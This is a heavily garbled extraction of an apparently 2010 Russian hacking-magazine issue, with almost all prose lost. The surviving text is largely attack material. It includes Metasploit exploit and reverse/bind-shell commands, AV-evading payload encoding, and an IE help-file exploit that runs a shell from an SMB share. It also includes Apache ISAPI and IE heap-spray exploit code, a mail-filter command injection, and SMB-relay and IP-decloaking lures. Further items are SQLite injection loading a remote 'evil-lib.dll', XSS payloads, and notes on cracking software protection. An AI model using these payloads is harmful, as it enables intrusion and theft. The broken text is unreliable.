NAS

3
5&

0,-*$,)6/
42!#

/.3

C 31

PC_ZONE
Skype' oldversion.com
crackmes.de:
HTTP://WWW
links
, .
The Butterfly
Security Project:
sourceforge.
net/projects/
thebutterflytmp
hackme

Foundstone:
www.foundstone.com
OWASP
InsecureWebApp:
www.owasp.org/index.
php/Category:OWASP_Insecure_Web_
App_Project
BadStore:
www.badstore.net
OWASP
SiteGenerator:
www.owasp.org/
index.php/Owasp_
SiteGenerator
,
. :
nmap', , SSH, , .
, VirtualBox',

forums.heorot.net.
Damn Vulnerable Linux (www.amnvulnerablelinux.org)
. , , .

,
, ,
(SQL-,
XSS ..), , , . LiveCD-
VMware VirtualBox.
De-ICE PenTest ,
. : -,
.
, ,

.
,
. ,
IP- : ,
!.
LiveCD .
de-ice.hackerdemia.com/doku.php.

-,
. ,
? , . cracker
,
, . crackmes,
, , www.crackmes.de www.
tdhack.com. : ,
, ,
-
036
,
. ,
,
.
,
cracking,
Cracking ][ #08/2005.

crackmes'.
,
, , -
. IE8, Vista/W7, , IE
6/7 XP
. : ,
?
Internet Explorer Collection (finalbuilds.edskes.
net/iecollection.htm).
Internet Explorer

.
IE ,
. ,

. ,
:
? ,
- :).
- , ,
www.oldapps.com oldversion.com,
. , ,
Winamp',
0.2 , .

- .
,
, . ?
,
,
.
,
, .
.z
X 05 /136/ 10
S TEP T W I T T E R . C O M / S T E PA H

. Apple ,
Nexus One,
, .
, HTC
, , :
.
,
. . Google
: ,
. ,
?
?

, .
, .
? ,
. ,
- .
, - ,
.
,
, .

,
.
,

. ? , Asus W6F

,
. Synaptics, ..
. ,
, , ,
TouchPad V6.2.

Synaptics, , -
,
iPhone
X 05 /136/ 10

, :
-
. , ,

(forums.hardwarezone.com.sg/showthread.
php?p=44505922).
HP,
!
,
,

.
:
!
Gestures ( ,
).

,
. Synaptics Scrybe (www.uscrybe.com),

gestures.
, : ASUS,
IBM, Dell, Samsung .. ,

BenQ. !
,
!
code.google.com
nihon-nukitescroll (code.google.com/p/nihon-nukite-scroll).

( ) .
, , , . z
037

GreenDog agrrrdog@gmail.com
Easy Hack
1
: -

:
Firewall .
, ,
. ,
, , ,
, backconnect . , . , DNS.
, ( ). - .
DNS, dnscat (- netcat).
:
DNS example.com,
. , somedata.example.com,
DNS-. 150 ,
, .
, ,
.
, ?!
, Ron dnscat
! metasploit.
,
. , !
, :
1. metasploit.
2. : skullsecurity.org/blogdata/dnscat-shell-win32.rb
( DVD).
3. metasploit modules/payloads/singles/windows/.
4. dnscat- metasploit,
:
) dnscat (skullsecurity.org/wiki/index.php/Dnscat);
: ,

EXE, ZIP, DLL ..
:
,
, ,
, -exe, -zip, -dll proxy. , , .
, . :
038
icecast_
header dnscat-
, , dnscat!
) sudo ./dnscat listen;
:
1. :
msf > use exploit/windows/http/icecast_header
2. dnscat-:
msf exploit(icecast_header) > set PAYLOAD windows/dnscatshell-win32
PAYLOAD => windows/dnscat-shell-win32
3. :
msf exploit(icecast_header) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
4. DNS-:
msf exploit(icecast_header) > set DOMAIN example.org
DOMAIN => example.org
5. :
msf exploit(icecast_header) > exploit
dnscat- , ..
.
DNS, ,
primary dns IP .
1. .
, ,
. .
.
. .
2. .
, , . :
, , .
c - , jpeg
X 05 /136/ 10
pdf, . exe, proxy

jpeg.
c php allow_url_fopen php.ini,
.
:
<?php
echo GET[l]...$_GET[t].<br>; // URL
$name=rand(1,100); //
$file = file_get_contents($_GET[l]...$_GET[t]); //

$fp=fopen($name.jpg,wb);//
fputs($fp,$file);//
fclose($fp);
echo <a href=$name.jpg>download</a>;//
?>
! :
http://127.0.0.1/jpg.php?l=http://download.qip.ru/
qip8095&t=exe
. .
-, . : . php.ini.
, , ,
php curl, .
:
. , . ,
metasploit.
1. smb relay.
, smb relay. 10 , -
, NTLM-,
, .
- .
( ), smb relay
man-n-middle , ..
,
.
.
(. ):
1. (attacker) (victim) .
2. (target) 8-
.
3. .
4. .
5. .
, ,
Microsoft 2 .
, Metasploit , smb relay. web-:
1. Microsoft Windows SMB Relay Code
Execution.
2. payload. , generic/shell_bind_tcp.
3. LPORT,
.
4. SMBHOST ip- , .
5. .
, smb-,
smb-host
.
2. smb sniffer.
smb relay ,
. ,
X 05 /136/ 10
metasploite
, metasploit capture/smb.
:
1. :
msf > use auxiliary/server/
capture/smb
2.
msf auxiliary(smb) > run
smb relay ,
smb- ,
1122334455667788, .
smb relay .
,
? .
:
e-mail, html-
:
<img src="\\Attacker\SHARE\
file.jpg">
,
,

.
, , XSS ,
, DNS, ARP.
, securitylab.ru/contest/212100.
php securitylab.ru/analytics/362448.php:
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;
039
Windows NT 5.1; MyIE2)\r\n";

$request .= "Host: " . $host . "\r\n";
$request .= "Content-length: ". strlen($cmd) . "\r\n";
$request .= "Connection: Keep-Alive\r\n";
$request .= " Cache-Control: no-cache\r\n";
$request .= "\r\n";
$request .= $cmd . "\r\n";
$socket = fsockopen($host, $port ? $port : 80);
fputs($socket, $request);
while(!feof($socket))
: CMS
.
: .
cms. : , Google,
cms .
:
1.
2.
3.
4.
5.
7.
html- .
java-.
robots.txt.
.
http- cookies.
(ERROR404).
, - , -, :
builtwith.com
webmastercoffee.com
echo fgets($socket, 1024);

fclose($socket);
}
?>
3. :
http://localhost/input.php?host=www.example.
com&script=index.php?page=&cmd=phpinfo()
4. :).
2ip.ru
cms,
, ,

.
,
,

.

Wappalyzer
cms Wappalyzer
firefox.
, ,
.
.
Wappalyzer. :
1. Wappalyzer.
2. zip .
3. \chrome\content\overlay.js.
: IP-
.
:
- . - . ,
. tcp/ip
,
, . ,
.
, IP ,
/ NAT. .
, , XSS -
, .
IP. ,
, XSS-, .
, , , PHP-
, , IP .
,
NAT. . ?
! Metasploit.
, Decloak: DeAnoynmized.
, , php (
) :
<?php $id=md5("blablabla" . $_SERVER['REMOTE_ADDR'] .
$_SERVER[REMOTE_PORT] . time() . " blablabla ");
040
http://decloak.net/report.html
$log= $id."-".$_SERVER['REMOTE_ADDR']."\r\n";
$fp=fopen("iplog.txt","a");//
fputs($fp, $log); //
fclose($fp);
?>
<html><head><meta http-equiv="Content-Type" content="text/
html; charset=utf-8" />
<title> </title></head><body>
<p><img src="001.gif" width=200 height="153" /></p>
<iframe src=http://decloak.net/decloak.html?cid=<?php echo
$id; ?>&word=0&itunes=0&quicktime=0" width="0" height="0"
scrolling="no"></iframe> </body></html>
, , ,
, decloak.net/decloak.html. IP
decloak.net/report.html?cid=<unicid>&format=text
<unicid> 32 id .
iplog.txt, :
X 05 /136/ 10
d50712b92c93b98d063735612a6b78ea-127.0.0.1
id IP ,
&word=0&itunes=0&quicktime=0
,
decloak IP-,
.
IP, , XSS,
, 32- :
<iframe src=http://decloak.net/decloak.html?cid=<unicid>&word=0&
itunes=0&quicktime=0 width=0 height=0 scrolling=no></iframe>
ID.
,
jpeg, , .htaccess , jpeg php.
AddHandler application/x-httpd-php .jpeg
, Tor-,
IP-.
, ,
,
decloak.net.
: ,
.
:
- .
. , .
.
1. - . -,
.
2. .
3. , , . ,
100% .
4. , . Metasploit.
Metasploit : ,
- . , , -
Metasploit , .
msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L
PORT=5555 X > reverse.exe
, mfsconsole,
Metasploit payload.
exe- , 5555
192.168.146.128. X ,
exe-. :
C
P
J
V
y
R

Perl
JavaScript
VBA
Ruby

. , . :
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_
tcp LHOST=192.168.146.128 LPORT=5555 E
msfcli Metasploit.
, reverse.exe , 5555
. ,
payload Metasploit .
, , . reverse.exe
21 41, virustotal.com (. ).
? Metasploit msfencode. , ,
, -.
. :
reverse.exe. 21 41
PORT=5555 R | msfencode -c 5 - e x86/shikata_ga_nai -x notepad.
exe -t exe > reverspad.exe
msfpayload ,
, msfencode.
:
-c 5 -e x86/shikata_ga_nai (5 ) shikata_ga_nai:
-x notepad.exe msfencode - -
. , notepad.exe ,
.
-t , .. executable.
. Msfencode
PE- , , .text
. exe-,
.
. -, -, -, reverspad.exe -- notepad.exe.
, .
. , ,
. ,
reverspad.exe (. ). , msfencode,
. z
reverspad.exe. 2 41.
msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L

X 05 /136/ 10
041

, Digital Security dookie@inbox.ru
, Acrobat Reader .
01

INTERNET EXPLORER
TARGETS
Internet Explorer 7/8
Windows XP
Windows 2000/2003
BRIEF

(Maurycy Prodeus),
Internet Explorer.
, MsgBox(), Visual Basic-,
.hlp-. , <F1> MsgBox().
, , WebDAV.
, .hlp
, ExecFile().
EXPLOIT
,
. ,
HLP <F1>.
,
,
, , , - , / . ,
ie_winhlp32. , ,
80 , URIPATH
042
ROP .
/. . ,

. , ,
. , ,
HLP- EXE,
.
HLP-. Microsoft Help Workshop
4 ( ). HLP-
RTF-, Worde.
(->). . : $ ZLO, # IDH_1
X 05 /136/ 10
. !.
F1
. ,
free, IP 10.10.10.10. :
!ExecFile(cmd,/c net use z: \\\\10.10.10.10\\free)
!ExecFile(cmd,/c wscript z:\\exec.vbs)
, ,
exec.vbs. exec.vbs:
Dim WshShell,oExec
Set WshShell = wscript.createobject("wscript.shell")
Set oExec = WshShell.Exec("z:\zlo.exe")
. ,
? , ,
,
cmd.exe, ,
. ,
wscript , , ,
cmd.exe. , , . cygwin
:
msfpayload windows/shell_bind_tcp LPORT=4444 X > zlo.exe
X 05 /136/ 10
HLP-, Microsoft Help Workshop,

File, RTF. Map : IDH_1=1.
Compile .hlp.
free, HLP, EXE VBS . , , :
<html>
<script type="text/vbscript">
big = "\\10.10.10.10\free\EXEC.HLP"
MsgBox "please press F1 to save the world", ,
"please save the world", big, 1
MsgBox "press F1 to close this annoying popup", ,"",
big, 1
</script>
</html>
<F1>
, 4444 . big HLP ,
, , (, IDH_1=1?).
SOLUTION
Microsoft <F1>.
, :
echo Y | cacls "%windir%\winhlp32.exe" /E /P everyone:N
043
: "pwn-isapi". ,
.
:
...
//
serverIP = string(argv[1]);
isapiDLL = string(argv[2]);
, 0-day IE6/7.

. Internet Explorer (-> ->->->).
02

APACHE ISAPI_
MODULE
TARGETS
Apache <= 2.2.14
Windows XP
Windows 2000/2003
BRIEF
isapi - Apache Windows
, -
IIS. . , -
.
DLL-, , ,
cgi-bin. DLL : "AddHandler isapi-handler .dll".
ISAPI-,
, . ,
ISAPI- (RESET-), , .
, isapi, , ,
, ,
.
EXPLOIT
- (Brett Gervasoni), ,
. POST- ISAPI- , ,
,
. , -http-. A (0x41 INC ECX:
NOP) . , ,
, ,
ISAPI. ,
,
-. ,

, , , .
, sos.txt .
044
// ''
memset(accept, 'A', 170);
memset(referer, 'A', 732);
memset(cookie, 'A', 5375);
memset(random, 'A', 7603);
memset(postData, 'A', 23378);
memset(footer, 'A', 298);
//
triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
"User-Agent: AAAAAAAA\r\n"
"Pragma: no-cache\r\n"
"Proxy-Connection: Keep-Alive\r\n"
"Host: " + serverIP + "\r\n"
"Content-Length: 40334\r\n\r\n" +
string(footer);
//
payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
"Accept: " + string(accept) + "\r\n"
...
"Proxy-Connection: Keep-Alive\r\n"
"Okytuasd: " + string(cookie) + string(shellcode)
+ "\r\n" // -
"Asdasdasdasdasd: " + string(random) +
string(shellcode) + "\r\n"
"Asdasda: " + string(random) +
"Sewrwefbui: " + string(random) +
"Qdfasdernu: " + string(random) +
"Cdffew-asdf: " + string(random) +
...
"Content-Length: 25054\r\n\r\n" +
string(postData) + "CCCC" +
string(shellcode) + "BBBB" + string(footer);
//
...
//createConnection -
if (createConnection(serverIP, SERVER_PORT) == 1)
{
printf("- an error occurred connecting to the
server\n");
return 1;
}
...
linger_data.l_onoff = 0;
linger_data.l_linger = 0;
// RESET
setsockopt(sock, SOL_SOCKET, SO_LINGER,
X 05 /136/ 10
BRIEF
0day. ,
IE 6/7. , .
iepeers.dll, ,
, .
EXPLOIT
,
, McAfree,
www.topix21century.com.
. , , ,
( 0day).
:
<button id='trigg' onclick='attack();'
style='display:none'></button>
ISAPI exploit.
(char*)&linger_data, sizeof(linger_data));
setsockopt(sock, SOL_SOCKET, SO_DONTLINGER,
(char*)&linger_data, sizeof(linger_data));
...
sendTransmission(triggerVuln); //
Sleep(2000); // 2 , Apache
WSACancelBlockingCall(); // RESET
...
// , ,
//
...
sendTransmission(payload); // POST
-
, , DEP. DEP,
DoS.
<script language='javascript'>
function attack()
{
heap_spray();
// heap-spray,
var obj = document.createElement('body');
//
obj.addBehavior('#default#userData');
document.appendChild(obj);
//
//
for (i=0; i<10; i++)
{ //
obj.setAttribute('s',window);
//
}
window.status+='';
// windows
}
document.getElementById('trigg').onclick();
//
}
</script></body></html>
,
,
window, .
SOLUTION
- 2.2.15. ,
ISAPI-, .
SOLUTION
IE6/7 DEP. ,
. ,
. Internet Explorer 8 .
Microsoft, .
03
04
INTERNET
EXPLORER
TARGETS
Internet Explorer 6/7
Windows XP/Vista
Windows 2000/2003/2008
X 05 /136/ 10
LIBTIFF
ACROBAT READER
TARGETS
Acrobat Reader 9.0-9.3/8.0-8.2
Windows XP/Vista
Windows 2000/2003/2008
045
BRIEF
PDF ,
, . Acrobat Reader ,
. Flash.
, , PDF
. 2010
PDF . , , .
EXPLOIT

Acrobat Reader. , JavaScript, , , .
libTiff. LibTIFF,
,
TIFF. ,
Adobe libTiff, ,
- , . ,
2006 .
,
*nix . Acrobat Reader

2006 PDF-
(, TIFF *nix, , , ).
DotRange.
TIFFFetchShortPair() libTiff , N
( ) .
_TIFFmemcpy(cp, tif->tif_base + dir->tdir_offset, cc);
cp : cc, . ,
cp , . ,
TIFF- DotRange ,
return-oriented programming (ROP).
-, - . ,
,
.
, -,
, .
, ,
.
TIFF-
, ,
. , .
.
538 , , ,
TIFF_OFSET, ,
.
gen_tiff(). :
tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\
x20\x00\x00\x00\x00"
046
46
DotRange (\x50\x01 = 0x150) 0xCC. , , 0x98,

. ,
, tiff. ,
ROP-
, ,
.
SOLUTION
Acrobat Reader,
9.3.1.
05
ROOT APACHE SPAMASSASSIN

MILTER PLUGIN
TARGETS
spamass-milter < 0.3.1
BRIEF
Milter Plugin Sendmail,
SpamAssassin, , ,
, .
, ,
, .
Kingcope, : , , , xscreensaver (symlink), MySQL (format string), 0day
Samba (directory traversal) .

, ,
.
: ,
popen().
EXPLOIT
():
sfsistat
mlfi_envrcpt(
SMFICTX* ctx,
char** envrcpt
)
{
struct context *sctx = (struct context*)
smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* RCPT TO: */
char buf[1024];
X 05 /136/ 10
char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL,
envrcpt[0]); //
#else
/* Kingcope , snprintf. ,
, ?*/
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
// RCPT TO: buf
#endif
rcpt to: root+:"|touch /tmp/foo"

250 2.1.5 Ok
popen.
root+:, ,
bv sendmail.
touch /tmp/foo. , . , .
:
sendmail bv root+:|touch /tmp/foo 2>&1.
, -

debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__)
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS,
"Could not lock popen mutex: %s",
strerror(rv));
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
SOLUTION
, .
abort();
}
#endif
/* */
p = popen(buf, "r");
// pipe
if (!p)
{
debug(D_RCPT, "popen
failed(%s). Will not expand
aliases", strerror(errno));
assassin->
expandedrcpt.push_back(
envrcpt[0]);
popen,

execl(shell path, "sh", "-c", <
popen>, (char *)0). fmt
,
stderr,

|, , ,
,
. :
$ nc localhost 25
220 ownthabox ESMTP Postfix
(Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
X 05 /136/ 10
047

d0znp ONsec
,

SQLITE
, .
,
. ,
. , ,
. ,
SQLite .
SQLite
, ,

3306, .
-

. :
,
.
,
.
,
SQLite.
: Symbian, Apple iPhone,
048
Google Android ,
.
,
, -
SQLite Wordpress, phpBB3
. -,
PHP .
SQLITE -
SQLite ,
PHP.
PHP

php_sqlite3 php_sqlite (
3 2, )
php_sqlite3 + php_pdo_sqlite.
, ,
,
.
,
. ,
SQLite3Stmt
prepared statement. ,
MySQL (
Eleanor CMS :) ).
. ,
,
. , . Prepared
Statements , ,
FROM table.
mysql_real_
X 05 /136/ 10
SQLite
,
HTML, XSS.
escape_string()
,
version(). SQLite sqlite_version() ( )
:
sqlite> select sqlite_version();
3.6.23
substr(X,Y)
substr(X,Y,Z): ,
, .
1.
sqlite> select substr('abcdefgh',1,2);
ab

0x00, .
SQLite zeroblob(N). N
0x00 .
,
trim(X,Y).
,
X.
sqlite> select trim('aa12312asd123asda','asd');
, .
, , SQLite .
, !
.
.
MySQL, , sqlite.
org/lang_comment.html
:
--comment
/*comment*/

*/ .
:
SELECT * FROM temp WHERE id=injection-here
/* and groud_id=5
.
, :
SELECT id, text FROM data WHERE id='5'
UNION SELECT user, pass FROM user '
UNION SELECT user, pass FROM user '''''
'
UNION SELECT user, pass FROM user "
UNION SELECT user, pass FROM user """ "
HTTP://WWW
links
oxod.ru
.
.
,
.
http://sqlite.
org/lang.html
SQL
SQLite.

.
sqlite.org/limits.
html
SQLite.
.
sqlite.org/faq.
html

.
sqlite-crypt.com/
documentation.htm

.
AES 1 .
12312asd123
.
,
SQLite, sqlite_compileoption_get(N).
, .
sqlite> select
ENABLE_FTS3
sqlite> select
ENABLE_RTREE
sqlite> select
TEMP_STORE=1
sqlite> select
THREADSAFE=0
sqlite_compileoption_get(0);
, concat() char()
-
.
X 05 /136/ 10
SQLite ,
.
mysql_escape_string. sqlite_escape_
string() sqlite3_escape_
string(). ,
. , SQLite . , .
:
1. \ - / * % _ sqlite_escape_string sqlite3_
escape_string .
2. . .
:
WARNING
warning
!

!
,

049
1. :
$query = 'SELECT data FROM tabl1 where
id="'.sqlite_escape_string($id).'" ';
$query = 'SELECT data FROM tabl1 where

id="'.sqlite3_escape_string($id).'" ';
:
test.php?id=1/**/UNION/**/SELECT/**/
password/**/FROM/**/USERS/**/LIMIT/**/1
2. sqlite_escape_string() sqlite3_escape_
string() HTML
XSS :
<input type='text' value='test''
onclick=javascript:alert(22) '>
3. LIKE, , %
-.
4. \, :
$query = "SELECT data FROM tabl1 where
id='".sqlite_escape_string($id)."'";
$query = SELECT data FROM tabl1 where

id='".sqlite3_escape_string($id)."'";
SQLite .
SQLITE_MASTER,
.
:
test.php?id=\
SQL . ,

HTML, HTML .
MySQL ,
INFORMATION_SCHEMA.
. SQLite
-
TABLE sqlite_master (
type TEXT,
name TEXT,
tbl_name TEXT,
rootpage INTEGER,
sql TEXT
);
. ,

SQL. SQL, .
, sqlite_escape_
string()
, . . , !
,
,
,
SQLITE_TEMP_MASTER.

LOAD_EXTENSION(). , ,
, SQLite
, .

,
.
:
The load_extension(X,Y) function
loads SQLite extensions out of
the shared library file named X
using the entry point Y. If Y is
omitted then the default entry
point of sqlite3_extension_init is
used. The extension can add new
functions or collating sequences,
but cannot modify or delete
existing functions or collating
sequences because those functions
and/or collating sequences might
be used elsewhere in the currently
running SQL statement. To load an
extension that changes or deletes
functions or collating sequences,
050
X 05 /136/ 10
SQL.
Nokia, Mozilla, SQLite

.
use the sqlite3_load_extension()
C-language API.
,
-.
, ,
sqlite3_
extension_init(). -
,
, SQLite, ,
- C++ API.
,
?!

SQLite Win32
:
#ifdef HACK
//'select load_
extension('sqlite_1251.dll', 'hack');
DWORD WINAPI ThreadProc(
sqlite3 *db)
{
Sleep(3000);
sqlite3_extension_init(
db,0,sqlite3_api);
return 0;
}
int __declspec(dllexport)
__cdecl hack()
{
HANDLE hThread;
SQLITE_EXTENSION_INIT2(pApi)
hThread = CreateThread(NULL,
0,ThreadProc,db,0,0);
CloseHandle(hThread);
X 05 /136/ 10
Win-
LOAD_EXTENSION(C:/boot.ini).
return 0;
}
#endif

: theli.is-a-geek.org/blog/
development/sqlite_hack.1024px#comment_
anchor. ,
,
.
,
, -, , ,
-, - .
,
-
-. INTO OUTFILE,
INTO DUMPFILE, LOADFILE()
SQLite . - Win-,
.
SMB:
SELECT data FROM tbl1
WHERE id=5/**/UNION/**/
ALL/**/SELECT/**/LOAD_
EXTENSION("\\10.10.10.10\evil-lib.
dll","bindShell");
,

. , , :
SELECT LOAD_EXTENSION(
'/file/that/does/not/exists');
:
Error: The specified module could
not be found.
, Win :
Error: The specified procedure
could not be found.
, :
Error: %1 is not a valid Win32
application.
,
,

. , ,
,
.
. ,
.

, -,
SQLite. ,

, , SQLite,
. ,
oxod.ru z
051

ELF ICQ 7719116
VS

,
, . ,
,
StarForce Protection System, . , !
( ),

! ,

:
if Enter_User_key = Real_Programm_
Key then
Call Registration_Success (Enter_
User_key)
else
MessageBox.Show ("Wrong KEY!")
end if
100% ,
. ,
shareware-

052
!
- .

Total Video Converter 3.12.
,
( CMP, JMP
), (
),
(onOk). ,
API
MessageBoxA, ,
(
) MessageBox (
42151) (JMP 421508). !
:).
, !

- ,
! ,
(, ,
, ),
( !).
,
,
, , . ?
,

!

( !)
!
, Trial
Free .

? , .
X 05 /136/ 10
:
:)
, .
, :
(
, , )
;
(Trial-, )
;

;

; :
() .
, .
UPX. ,
,
dll .
, , . , .
,
.
HDTunePro 3.50.
: -
, 1 .
, 15 -
. , (
12 ,
16, ?!; , , .
, ,
)
EAX (, 15-0=15). !
!
world-famous CnC3:
Tiberium Wars Electronic Arts ( ).
,
exe-,
. ,
X 05 /136/ 10
, (
). .
! ,
- Secure Mode Failed (-,
!). :
,
! ! ,
Electronic Arts ,
(,
)

! , cnc3.exe , GetDriveTypeA,
CMP EAX, 5, EAX
API .
.
, . ? ,
cnc3game.dat. ,
!
( ) ,
( ) ,
, cnc3.exe!
cnc3game.dat ( \RetailExe\[ ]\
cnc3game.dat) , !
IsDebuggerPresent (, ). ,
(: !) BlueSoleil
IVT Corporation.
:
12(!) (
). ! - ( ) .
API LoadString
,

, LoadString
.
!
IsDebuggerPresent OutpudDebugString.
,
. ! ,
.

Evaluation (,
About),
!
WARNING
warning
,

,
,
053
,
,
!
HDTunePro_ELF edition .
)

,
Evaluation BsSDK.dll (,
, .
,
), ,
Evaluation ,

, , ,
EAX !
,
MessageBoxA. , ,
.
:).
,
, ,
.
054
TVC! :

, . :

.
( BlueSoleil),
.
.
(
)
(, ASProtect) .
. ,
, ,

,
, 100%
, .
,
,
. , .
.

. ,
(,
OEP).
ResourceBuilder.
dll
ASProtect.

OEP, ?

.
(, ,
), ,
,
.
.

,

,

.
,

! , ,
StarForce
( ): ,
? ,
.

: ,

(, ).
, ,

, StarForce, .
, ,
(,
), .
, ,
, !
X 05 /136/ 10

.
!
SoftIce,
, (
) :).
, ,
,

!
,

( Electronic
Arts) :
3ds
Studio Max! ,
. ! ,
,
,
,
.
- .

StarForce
,
, ,
,
( ?

).
,
- ,

. !
,
:

! ,

.
! ,
- ,
, . ,
appdrvrem.exe IdaPro .
SafeDisk
.
StarForce ,
, SafeDisk 4.x
X 05 /136/ 10
IsDebuggerPresent?
IsDebuggerAbsent!
( ),
42h
41h
.
.
!
.
( )
.
.

,
;
, /

-
;

;

,
!
:
-
,
.
StarForce
,
(, ,
), ()

, (,
protect.dll OllyDbg).
: -

( )
.
protect.dll ,
,
,
.
:
KeBugCheckEx,

, ( ),
! !

,

.
.
, : ,

.

,
.
! 100%
,

. -

.

.
:
,
-
055

RAZ0R HTTP://RAZ0R.NAME
KeBugCheckEx,

,

, ResourceBuilder
.

regkey.bin.

.

? ,

:
[ ] = [
] * [
] / [
(, ,
)] * [
]) * [ ]
BlueSoleil .
. ,
, , .
,
.
-
.

( Tiberium Wars

,
),

?
:
( ), ( ), ,
z
IsDebuggerPresent? .
056
X 05 /136/ 10

AMS ax330d@gmail.com
Unicode-
, , Unicode,
, ,
. ! , ,
, .
, , ,
.
.

. 60 ASCII American
Standard Code for Information Interchange
(
), 7-
058
.

ASCII
.
ASCII-

. , ,
.
,

. 8-

.
ISO (International Organization
for Standardization,
) , ISO 8859.
UCS
(Universal Character Set,
). ,
UCS Unicode.
X 05 /136/ 10
Google
Unicode
, . , Unicode
.
Unicode 5.2.
- .
, ,
,
. , ,
.
- UNICODE
, ,
Unicode .
,
.
, Unicode?
.
1 100 000 ,
U+0000 U+10FFFF. ! Unicode
, ,
.
(, 0041 A) ,
, .
Unicode , UTF (Unicode Transformation Formats,
Unicode). :
UTF-7:

. RFC 2152. Unicode, .
UTF-8:
-. ,
1 4 .
, ASCII. U+0000
U+007F.
UTF-16: 2
4 . 2 . UCS-2 , 2
BMP.
UTF-32: 4
, 32 .
21 , 11 .

, 32-X 05 /136/ 10
PUNYCODE
.
DNS - ,
, DNS
ASCII-.
, ,
Unicode- .
.
xn-- Punycode.
, .ru Punycode :
xn--80akozv.ru. Punycode RFC 3492.
.
UTF-32 UCS-4,
.
, UTF-8 UTF-32 ,

UTF-16.
17 , 65536
. , .
BMP Basic MultiPlane.
UTF-16 UTF-32

, UTF-16LE/UTF-32LE, UTF16BE/UTF-32BE, . ,
LE little-endian, BE big-endian. -
.
U+FEFF, BOM,
Byte Order Mask. BOM
UTF-8, .
.
, - . ,
.
4 :
INFO
info
IDNA IDN in
Applications (IDN
),
,

,

.
IETF,

RFC
IDNA2003 RFC
3490.
.
Normalization Form D (NFD):

.
Normalization Form C (NFC):
+ .
Normalization Form KD (NFKD):
.
059
Bidi-
- mozilla.org FireFox IDND
Normalization Form KC (NFKC):

+ .
.

.
,
.

.
, .
, ,
.

, - .
060
,
,
.
,
,
. Unicode ,
, ,
,
. ,

. ,
- , .
IP/ARP/DNS ,
. -
,

.
, o
0, 5 s. , .
-
2000 PayPal, www.unicode.org.
.

Unicode, IDN, Internationalized Domain
Names (
). IDN
.

, ,
! ,
. , . ,
, , .
, IDN-.
, homograph attack, ,
(,
).
,
.

. ,
.

IDNA2003, , 2010 ,
IDNA2008.
X 05 /136/ 10
UTF-8
IDNA2003,
-.

. , Punycode
-
, .
.
Unicode .
- Unicode-, UC-Simlist (Unicode Similarity
List, Unicode). !
,
. , , .
- . ,
,
?
, , evilexe.
txt. ! -
evil[U+202E]txt.exe. ,
? , U+202E RIGHT-TO-LEFT OVERRIDE,
Bidi ( bidirectional)
, ,
.
. RLO, ,
RLO, .
- Mozilla Firfox cve.mitre.org/cgi-bin/
cvename.cgi?name=CVE-2009-3376.
,
(non-shortest form) UTF-8,
. PHP . ,
.
utf8_decode().
. ,
PHP-:
<?php
// ... 1
$id = mysql_real_escape_string($_GET['id']);
// ... 2
$id = utf8_decode($id);
X 05 /136/ 10
XSS-
// ... 3
mysql_query("SELECT 'name' FROM 'deadbeef'
WHERE 'id'='$id'");
, . ,
SQL-. ,
:
/index.php?id=%c0%a7 OR 1=1/*
,
. , . ,
. ,
? ,
.
%c0 %a7 , 11000000 10100111 .
00100111.
UTF-8.

. , (
, ), ,
.
, 110, ,
, 1 .
1
0. ! 11000000 10100111,
%c0%a7.
,
, , ,
addslashes(), mysql_real_escape_string(), magic_
quotes_qpc. ,
. ,
PHP UTF-8 .
,
.
. :
<?php
/**
HTTP://WWW
links
unicode.org

Unicode.

.
macchiato.com/
main

Unicode.
fiddler2.com/
fiddler2 Fiddler, ,
HTTP.
websecuritytool.
codeplex.com
Fiddler

HTTP-.
lookout.net
,
Unicode,

.
sirdarckcat.blogspot.com/2009/10/
couple-of-unicodeissues-on-php-and.
html
sirdarckat
PHP Unicode.
googleblog.blogspot.com/2010/01/
unicode-nearing-50of-web.html

Unicode.
061

<img alt='I am xxx?rc='http://

src=javascript:onerror=alert(/
xss/)//' />
* UTF-7 XSS PoC

*/
header('Content-Type: text/html;
charset=UTF-7');
$str = "<script>alert('UTF-7
XSS');</script>";
$str = mb_convert_encoding($str,
'UTF-7');
echo htmlentities($str);
,
,
. :
+ADw-script+AD4-alert('UTF-7
XSS')+ADsAPA-/script+AD4-
. ,

.
, .
,
,
.
<meta http-equiv="ContentType" content="text/html;
charset=UTF-7">
, ,

UTF-8.
Google,
XSS-,
UTF-7.
Google sla.ckers.org/forum/
read.php?3,3109.
062
: .
,
.
: , , PHP.
, , (ill-formed),

, U+FFFD, ..,
. -
, .
, PHP UTF-8
.

JavaScript-, SQL-.
,
Eduardo Vela aka sirdarckcat,
, , .
,
, :
<?php
// ... ,
$name = $_GET['name'];
$link = $_GET['link'];
$image = "<img alt='I am $name'
src='http://$link' />";
echo utf8_decode($image);
:
/?name=xxx%f6&link=%20
src=javascript:onerror=alert(/
xss/)//
, PHP
:
? $name
UTF-8 0xF6,
utf8_decode()
2 , . http:// , JavaScript-
. Opera,
,
,
.
,
PHP,
. ,
WAF/IPS
,
,
ASCII-. :
<sc\uFEFFript>aler\uFEFFt('XSS')</
scr\uFEFFipt>
\uFEFF ,
.

,
,
.
, , \uFEFF BOM,
.
FireFox mozilla.org/security/
announce/2008/mfsa2008-43.html
, ,
,
IDS/IPS, WAF
. bestfit mapping .
,
, - .
,
.

, , ,
.
.
best-fit mapping
. - ,

, .
,
.
,
X 05 /136/ 10
45 Unicode-Buffer
Overflows, Unicode-.
Fiddler -
.
U+2032 . ,
, .
, (Chris
Weber),

best-fit?
, .

, .
,
:
?moz?binding: url(http://
